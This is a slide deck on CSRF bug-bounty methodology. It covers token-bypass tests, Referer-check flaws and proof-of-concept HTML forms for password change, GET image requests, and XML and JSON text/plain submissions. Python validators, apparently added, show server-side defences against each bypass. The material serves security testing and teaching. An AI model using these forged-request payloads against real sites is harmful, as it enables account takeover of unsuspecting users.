CSRF Bug Hunting Methodology Guide

Uploaded by

M P
CSRF Bug Hunting

Methodology

Become a Successful
Bug Bounty Hunter

This presentation uses a free template provided by [Link]


[Link]
CSRF - Basics
• A logged-in user clicks a link or visits a page that carries your code
• Actions are performed in the user's account on their behalf, without their consent
• Changing the account email (account takeover, ATO)
• Updating account information
• Updating shipping information

CSRF - Protection
CSRF protection:
The idea is to stop a request originating from [Link] from being submitted silently and performing actions in the user's account on [Link]

CSRF - Approach
• Look for missing CSRF tokens!
• Check authenticated functions
• Unauthenticated forms (e.g. a contact form) are not interesting
• State-changing actions are the ones that must be protected
• Account updates, profile updates etc.

CSRF - Approach
• Get into the developer's mindset
• If they missed CSRF protection…
• …they may have missed other things too!
• Even if there is a CSRF token
• Chances are it can be bypassed!

CSRF - Tests
• Sending a blank CSRF token
• Deleting the CSRF token parameter
• Changing the request method (POST to GET)
• Reusing one account's CSRF token in another account
• Changing one character of the token
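Each of the tests above corresponds to a shortcut a server-side validator can take. The Python validator below is an added example (not from the slides) showing the checks a token handler needs so that every one of those five tests fails: the in-memory session store and the function names are constructed for the example.

```python
import hmac
import secrets

# Constructed in-memory session store (hypothetical; a real app uses its session backend).
SESSIONS = {}


def new_session(user):
    """Create a session and bind a fresh, random CSRF token to it."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid):
    """Token the server would embed in forms rendered for this session."""
    return SESSIONS[sid]["csrf"]


def validate_state_change(sid, method, form):
    """Return (ok, reason) for a state-changing request.

    The request must be a POST carrying a non-empty token that exactly matches
    the token bound to the caller's own session. Each early return maps to one
    of the tests listed on the slide.
    """
    session = SESSIONS.get(sid)
    if session is None:
        return False, "no session"
    if method.upper() != "POST":
        # State changes are never accepted over GET, so a POST->GET
        # downgrade cannot skip the token check.
        return False, "state change must use POST"
    token = form.get("csrf_token")
    if token is None:
        # Deleting the parameter is not the same as a valid token.
        return False, "token parameter missing"
    if token == "":
        # A blank token must fail, never be treated as 'no token required'.
        return False, "token blank"
    if not hmac.compare_digest(token, session["csrf"]):
        # Another account's token and a token with one character changed
        # both land here; constant-time compare avoids a timing side channel.
        return False, "token mismatch"
    return True, "ok"


if __name__ == "__main__":
    alice = new_session("alice")
    token = csrf_token_for(alice)
    print(validate_state_change(alice, "POST", {"csrf_token": token}))
    print(validate_state_change(alice, "POST", {"csrf_token": ""}))
    print(validate_state_change(alice, "GET", {"csrf_token": token}))
```

The validator binds the token to the session rather than to the user or the form, which is what makes the "share a token between accounts" test fail: Bob's token is never equal to the one stored for Alice's session.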

CSRF - Referer
• The Referer header is often used as the check
• Referer header set to [Link]
• If it matches – the request is accepted
• If it has any other value – the request fails

CSRF - Referer
• Referer Header Flaw 1
Some web apps only verify that their
domain appears somewhere in the Referer header

Bypass:
[Link]

CSRF - Referer
• Referer Header Flaw 2
Some web apps only verify that the
Referer header starts with their domain

Bypass:
[Link]

CSRF - Referer
• Referer Header Flaw 3
Some web apps skip the Referer check
entirely when the header is blank or absent
Bypasses with a blank Referer:
<meta name="referrer" content="no-referrer" />
<iframe src="data:text/html;base64,form_code_here">

Blank Referer and blank Origin:


<iframe src=data:text/html;base64,BASE64PAYLOAD>
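All three Referer flaws come down to how the header is compared. The Python below is an added example (not from the slides) that places the three flawed comparisons beside a strict one that parses the header and compares the host exactly, and refuses to proceed when neither Origin nor Referer is present. SITE_HOST and the sample header values are constructed placeholders, not the domains the slides elide.

```python
from urllib.parse import urlsplit

# Constructed placeholder for the application's own host.
SITE_HOST = "example.com"


def referer_substring_check(referer):
    """Flaw 1: accept if our domain appears anywhere in the Referer."""
    return bool(referer) and SITE_HOST in referer


def referer_prefix_check(referer):
    """Flaw 2: accept if the Referer merely starts with our origin."""
    return bool(referer) and referer.startswith("https://" + SITE_HOST)


def referer_optional_check(referer):
    """Flaw 3: skip the check entirely when the header is blank or absent."""
    if not referer:
        return True
    return urlsplit(referer).hostname == SITE_HOST


def strict_source_check(origin, referer):
    """Hardened check: prefer Origin, fall back to Referer, and fail closed.

    The header is parsed as a URL and its hostname compared exactly, so a
    foreign host that contains or is prefixed by SITE_HOST is rejected, and a
    request that carries neither header is rejected rather than waved through.
    """
    source = origin or referer
    if not source:
        return False
    parts = urlsplit(source)
    return parts.scheme == "https" and parts.hostname == SITE_HOST


def evaluate(referer):
    """Run one Referer value through all four checks (used for the demo table)."""
    return {
        "substring": referer_substring_check(referer),
        "prefix": referer_prefix_check(referer),
        "optional": referer_optional_check(referer),
        "strict": strict_source_check(None, referer),
    }


if __name__ == "__main__":
    # Constructed sample values: one legitimate, one per flaw.
    for value in ["https://example.com/settings",
                  "https://attacker.test/example.com",
                  "https://example.com.attacker.test/",
                  ""]:
        print(repr(value), evaluate(value))
```

Only the strict check rejects all three constructed foreign values; note that it must also fail closed on a missing header, since the page itself can legitimately suppress the Referer (the `no-referrer` policy above) and an attacker can do the same from their own page.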

CSRF – No protection
• Example of no CSRF protection
<html>
<body>
<form action="[Link]" method="POST">
<input type="hidden" name="newpassword" value="oops" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

CSRF – with Clickjacking
• CSRF combined with Clickjacking
• X-Frame-Options header missing -> the page can be framed (clickjacking)
• Send a blank CSRF token
• An error is thrown – but the submitted data is reflected in the page!
• Clickjacking is then needed to get the victim to submit the
reflected data!

CSRF – with GET method
• When the GET method is supported
• and no CSRF token is required
• Sample payload
<img src='[Link]'>

CSRF – in XML
• CSRF with an XML body
<html>
<body>
<form ENCTYPE="text/plain" action="[Link]" method="post">
<!-- the whole XML document is the field name; text/plain encoding sends it as-is -->
<input type="hidden" name="<foo> <html xmlns:html='[Link]'> <html:script>alert(1);</html:script> </html> </foo>">
<input type="submit" value="submit">
</form>
</body>
</html>

CSRF – in JSON
• CSRF with a JSON body
• More challenging
• The form encoding always inserts = between field name and value, so the JSON body cannot simply end in =
• The = has to be smuggled into a harmless position inside the JSON
• Set the email to myemail+2=@[Link]
• Mail to that address is delivered to myemail@[Link]

CSRF – in JSON
• CSRF with a JSON body
<html>
<body>
<form ENCTYPE="text/plain" action="[Link]" method="post">
<!-- the JSON prefix is the field name, the browser appends "=" and the value,
     so the body ends ..."recipient":"myemail+2=@domain"} and the = sits inside the email -->
<input type="hidden" name='{"params":{"limit":20,"and":false,"filters":[],"excluded_contacts":[]},"fields":["First Name","Last Name","Email Address","Title","Notes","Organization","Street","City","State","Tags","Zip Code","Phone Number","Gender","Event ID","Event Title","VIP","Twitter Handle","Twitter URL","Twitter Followers","Twitter Following","Facebook Name","Facebook URL","Facebook Friends","Instagram Handle","Instagram URL","Instagram Followers","Instagram Following","Website","Date Added","Unsubscribed"],"recipient":"myemail+2' value='@[Link]'>
<input type="submit" value="submit">
</form>
</body>
</html>
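The JSON trick only works if the server parses the body as JSON regardless of the Content-Type the browser actually sent. This added Python example (not from the slides) reproduces the text/plain form encoding the browser produces for a form like the one above, then contrasts a handler that ignores Content-Type with one that rejects anything but application/json and additionally requires a custom header. The shortened field set, the example.test domain and the X-Requested-With requirement are assumptions of the example.

```python
import json


def encode_text_plain_form(fields):
    """Browser encoding of a form with enctype=text/plain: one 'name=value'
    line per field, CRLF-terminated, with no escaping (simplified, constructed)."""
    return "".join(f"{name}={value}\r\n" for name, value in fields)


def media_type(headers):
    """Media type of the request without its parameters, e.g. 'application/json'."""
    return headers.get("Content-Type", "").split(";", 1)[0].strip().lower()


def naive_handler(headers, body):
    """Parses the body as JSON no matter which Content-Type arrived.
    This is the behaviour the slide's form relies on."""
    try:
        data = json.loads(body)
    except ValueError:
        return 400, "malformed json"
    return 200, data.get("recipient")


def hardened_handler(headers, body):
    """Refuses the bodies a cross-site HTML form can produce.

    A form can only send application/x-www-form-urlencoded, multipart/form-data
    or text/plain, so insisting on application/json closes the text/plain trick.
    A custom header adds a second line of defence: a cross-origin page cannot
    attach it without a CORS preflight that the server would not approve.
    """
    if media_type(headers) != "application/json":
        return 415, "unsupported media type"
    if headers.get("X-Requested-With") != "XMLHttpRequest":  # assumption: the app's own JS sets this
        return 403, "missing custom header"
    return naive_handler(headers, body)


# Constructed cross-site form with a single field: the JSON prefix is the field
# name and the remainder is its value, so the '=' the browser inserts lands
# inside the recipient string, exactly as on the slide.
ATTACK_FIELDS = [('{"recipient":"myemail+2', '@example.test"}')]
ATTACK_BODY = encode_text_plain_form(ATTACK_FIELDS)


if __name__ == "__main__":
    print(ATTACK_BODY)
    print(naive_handler({"Content-Type": "text/plain"}, ATTACK_BODY))
    print(hardened_handler({"Content-Type": "text/plain"}, ATTACK_BODY))
```

The trailing CRLF the encoding adds is whitespace that json.loads tolerates, which is why the naive handler accepts the forged body; the hardened handler never gets that far because the media type check fails first.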

Thank You!

Become a Successful
Bug Bounty Hunter
